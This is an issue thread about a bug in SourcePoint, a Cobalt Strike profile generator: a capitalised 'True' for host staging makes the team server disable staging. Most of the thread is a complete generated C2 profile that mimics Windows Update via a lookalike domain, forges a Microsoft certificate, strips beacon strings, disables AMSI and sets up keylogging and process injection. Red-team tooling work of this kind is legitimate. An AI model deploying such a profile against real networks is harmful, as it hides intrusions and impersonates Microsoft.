Staging Disabled In Profile
monpolo opened this issue · 3 comments
This is from the latest version of Cobalt Strike, downloaded today. Quite possibly user error, but I'd appreciate any insights you can provide.
Generating Profile:
┌──(kali㉿kali)-[~/Desktop/SourcePoint-main]
└─$ ./SourcePoint -Injector NtMapViewOfSection -Host 0012eb.lwindowsupdate.com -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome
_____ ____ _ __
/ ___/____ __ _______________ / __ \____ (_)___ / /_
\__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
___/ / /_/ / /_/ / / / /__/ __/ ____/ /_/ / / / / / /_
/____/\____/\__,_/_/ \___/\___/_/ \____/_/_/ /_/\__/
(@Tyl0us)
[] Preparing Varibles...
[] Building Profile...
[!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
[] Post-Ex Process Name: gpupdate.exe
[] Seleted Profile: WindowsUpdate
[+] Profile Generated: teststage2.profile
[+] Happy Hacking
Starting the Cobalt Strike team server prints:
┌──(kali㉿kali)-[~/Desktop/cs-1/cobaltstrike]
└─$ sudo ./teamserver 192.168.2.200 password ./teststage2.profile
[] Will use existing X509 certificate and keystore (for SSL)
[+] I see you're into threat replication. ./teststage2.profile loaded.
[] Loading properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop).
[!] Properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop) was not found.
[!] Woah! Your profile disables hosted payload stages. Payload staging won't work.
[+] Team server is up on 0.0.0.0:50050
[*] SHA256 hash of SSL cert is:
Contents of teststage2.profile:
# NOTE(review): the team server compares this value case-sensitively. With "True" the
# startup log reports "Woah! Your profile disables hosted payload stages" even though
# the generator printed "Host Staging Is Enabled", so the two tools disagree about the
# effective setting. Commenting the line out is reported to work; a lowercase "true"
# is presumably what the parser expects — confirm against the malleable C2 docs.
set host_stage "True";
set sleeptime "44000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36";
set data_jitter "50";
set smb_frame_header "";
set pipename "plugplay+3850";
set pipename_stager "plugplay+1395";
set tcp_frame_header "";
set ssh_banner "Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)";
set ssh_pipename "plugplay+##";
#### Manually add these if you're doing C2 over DNS (future release) ####
# NOTE(review): only the "dns-beacon {" and "}" wrapper lines are commented out, so the
# dns_* settings below are still parsed as top-level settings rather than being skipped.
##dns-beacon {
set dns_idle "1.2.3.4";
set dns_max_txt "199";
set dns_sleep "1";
set dns_ttl "5";
set maxdns "200";
set dns_stager_prepend "doc-stg-prepend";
set dns_stager_subhost "doc-stg-sh.";
set beacon "doc.bc.";
set get_A "doc.1a.";
set get_AAAA "doc.4a.";
set get_TXT "doc.tx.";
set put_metadata "doc.md.";
set put_output "doc.po.";
set ns_response "zero";
#}
stage {
set obfuscate "true";
set stomppe "true";
set cleanup "true";
set userwx "false";
set smartinject "true";
#TCP and SMB beacons will obfuscate themselves while they wait for a new connection.
#They will also obfuscate themselves while they wait to read information from their parent Beacon.
set sleep_mask "true";
set checksum "0";
set compile_time "05 Jun 2028 09:16:06";
set entry_point "229200";
set image_size_x86 "397312";
set image_size_x64 "397312";
set name "Windows.System.Diagnostics.dll";
set rich_header "\x56\xb8\x3f\x82\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x1b\xa1\xc2\xd1\x7b\xd9\x51\xd1\x49\xb1\x55\xd0\x19\xd9\x51\xd1\x49\xb1\x52\xd0\x11\xd9\x51\xd1\x49\xb1\x54\xd0\x0c\xd9\x51\xd1\x12\xd9\x50\xd1\x0f\xdc\x51\xd1\x49\xb1\x50\xd0\x1a\xd9\x51\xd1\x49\xb1\x51\xd0\x13\xd9\x51\xd1\x49\xb1\x58\xd0\x3f\xd9\x51\xd1\x49\xb1\xac\xd1\x13\xd9\x51\xd1\x49\xb1\xae\xd1\x13\xd9\x51\xd1\x49\xb1\x53\xd0\x13\xd9\x51\xd1\x52\x69\x63\x68\x12\xd9\x51\xd1\x00\x00\x00\x00\x00\x00\x00\x00";
transform-x86 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "NtQueueApcThread" "";
strrep "IsWow64Process" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "kernel32" "";
strrep "beacon.dll" "";
strrep "KERNEL32.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
transform-x64 {
prepend "\x90\x90\x90"; # NOP, NOP!
strrep "ReflectiveLoader" "";
strrep "This program cannot be run in DOS mode" "";
strrep "beacon.x64.dll" "";
strrep "NtQueueApcThread" "";
strrep "IsWow64Process" "";
strrep "HTTP/1.1 200 OK" "";
strrep "Stack memory was corrupted" "";
strrep "kernel32" "";
strrep "beacon.dll" "";
strrep "KERNEL32.dll" "";
strrep "ADVAPI32.dll" "";
strrep "WININET.dll" "";
strrep "WS2_32.dll" "";
strrep "DNSAPI.dll" "";
strrep "Secur32.dll" "";
strrep "VirtualProtectEx" "";
strrep "VirtualProtect" "";
strrep "VirtualAllocEx" "";
strrep "VirtualAlloc" "";
strrep "VirtualFree" "";
strrep "VirtualQuery" "";
strrep "RtlVirtualUnwind" "";
strrep "sAlloc" "";
strrep "FlsFree" "";
strrep "FlsGetValue" "";
strrep "FlsSetValue" "";
strrep "InitializeCriticalSectionEx" "";
strrep "CreateSemaphoreExW" "";
strrep "SetThreadStackGuarantee" "";
strrep "CreateThreadpoolTimer" "";
strrep "SetThreadpoolTimer" "";
strrep "WaitForThreadpoolTimerCallbacks" "";
strrep "CloseThreadpoolTimer" "";
strrep "CreateThreadpoolWait" "";
strrep "SetThreadpoolWait" "";
strrep "CloseThreadpoolWait" "";
strrep "FlushProcessWriteBuffers" "";
strrep "FreeLibraryWhenCallbackReturns" "";
strrep "GetCurrentProcessorNumber" "";
strrep "GetLogicalProcessorInformation" "";
strrep "CreateSymbolicLinkW" "";
strrep "SetDefaultDllDirectories" "";
strrep "EnumSystemLocalesEx" "";
strrep "CompareStringEx" "";
strrep "GetDateFormatEx" "";
strrep "GetLocaleInfoEx" "";
strrep "GetTimeFormatEx" "";
strrep "GetUserDefaultLocaleName" "";
strrep "IsValidLocaleName" "";
strrep "LCMapStringEx" "";
strrep "GetCurrentPackageId" "";
strrep "UNICODE" "";
strrep "UTF-8" "";
strrep "UTF-16LE" "";
strrep "MessageBoxW" "";
strrep "GetActiveWindow" "";
strrep "GetLastActivePopup" "";
strrep "GetUserObjectInformationW" "";
strrep "GetProcessWindowStation" "";
strrep "Sunday" "";
strrep "Monday" "";
strrep "Tuesday" "";
strrep "Wednesday" "";
strrep "Thursday" "";
strrep "Friday" "";
strrep "Saturday" "";
strrep "January" "";
strrep "February" "";
strrep "March" "";
strrep "April" "";
strrep "June" "";
strrep "July" "";
strrep "August" "";
strrep "September" "";
strrep "October" "";
strrep "November" "";
strrep "December" "";
strrep "MM/dd/yy" "";
strrep "Stack memory around _alloca was corrupted" "";
strrep "Unknown Runtime Check Error" "";
strrep "Unknown Filename" "";
strrep "Unknown Module Name" "";
strrep "Run-Time Check Failure #%d - %s" "";
strrep "Stack corrupted near unknown variable" "";
strrep "Stack pointer corruption" "";
strrep "Cast to smaller type causing loss of data" "";
strrep "Stack memory corruption" "";
strrep "Local variable used before initialization" "";
strrep "Stack around _alloca corrupted" "";
strrep "RegOpenKeyExW" "";
strrep "egQueryValueExW" "";
strrep "RegCloseKey" "";
strrep "LibTomMath" "";
strrep "Wow64DisableWow64FsRedirection" "";
strrep "Wow64RevertWow64FsRedirection" "";
strrep "Kerberos" "";
}
}
process-inject {
# set remote memory allocation technique
set allocator "NtMapViewOfSection";
# shape the content and properties of what we will inject
set min_alloc "9457";
set userwx "false";
set startrwx "true";
transform-x86 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
transform-x64 {
prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}
# specify how we execute code in the remote process
execute {
CreateThread "ntdll.dll!RtlUserThreadStart+0x2302";
NtQueueApcThread-s;
SetThreadContext;
CreateRemoteThread;
CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
RtlCreateUserThread;
}
}
post-ex {
# control the temporary process we spawn to
set spawnto_x86 "%windir%\syswow64\gpupdate.exe";
set spawnto_x64 "%windir%\sysnative\gpupdate.exe";
# change the permissions and content of our post-ex DLLs
set obfuscate "true";
# pass key function pointers from Beacon to its child jobs
set smartinject "true";
# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";
# control the method used to log keystrokes
set keylogger "SetWindowsHookEx";
}
http-get {
set uri "/c/msdownload/update/others/2019/12/7jJw9JrTrLDNfSeO3i ";
client {
header "Accept" "*/*";
header "Host" "0012eb.lwindowsupdate.com";
metadata {
base64url;
append ".cab";
uri-append;
}
}
server {
header "Content-Type" "application/vnd.ms-cab-compressed";
header "Server" "Microsoft-IIS/8.5";
header "MSRegion" "N. America";
header "Connection" "keep-alive";
header "X-Powered-By" "ASP.NET";
output {
print;
}
}
}
http-post {
set uri "/c/msdownload/update/others/2019/12/b4v2CKdyaMF33ftBarW-faotz ";
set verb "GET";
client {
header "Accept" "*/*";
id {
prepend "download.windowsupdate.com/c/";
header "Host";
}
output {
base64url;
append ".cab";
uri-append;
}
}
server {
header "Content-Type" "application/vnd.ms-cab-compressed";
header "Server" "Microsoft-IIS/8.5";
header "MSRegion" "N. America";
header "Connection" "keep-alive";
header "X-Powered-By" "ASP.NET";
output {
print;
}
}
}
http-stager {
server {
header "Content-Type" "application/vnd.ms-cab-compressed";
}
}
https-certificate {
set CN "0012eb.lwindowsupdate.com"; #Common Name
set O "Microsoft Corporation"; #Organization Name
set C "US"; #Country
set L "Redmond"; #Locality
set OU "Microsoft IT"; #Organizational Unit Name
set ST "WA"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
I tinkered around a bit: if I comment out the first line so that it reads
#set host_stage "True";
it works just fine. Again, this could very well be a silly mistake on my part, but from how I'm interpreting your README this seems to be unexpected behavior.
Looks like it's a case-sensitivity issue: the generated profile writes `"True"`, while the team server presumably expects the lowercase `"true"`. I will update it tonight and close this ticket once the new version is pushed. Thank you for letting me know.
Fixed in version 1.2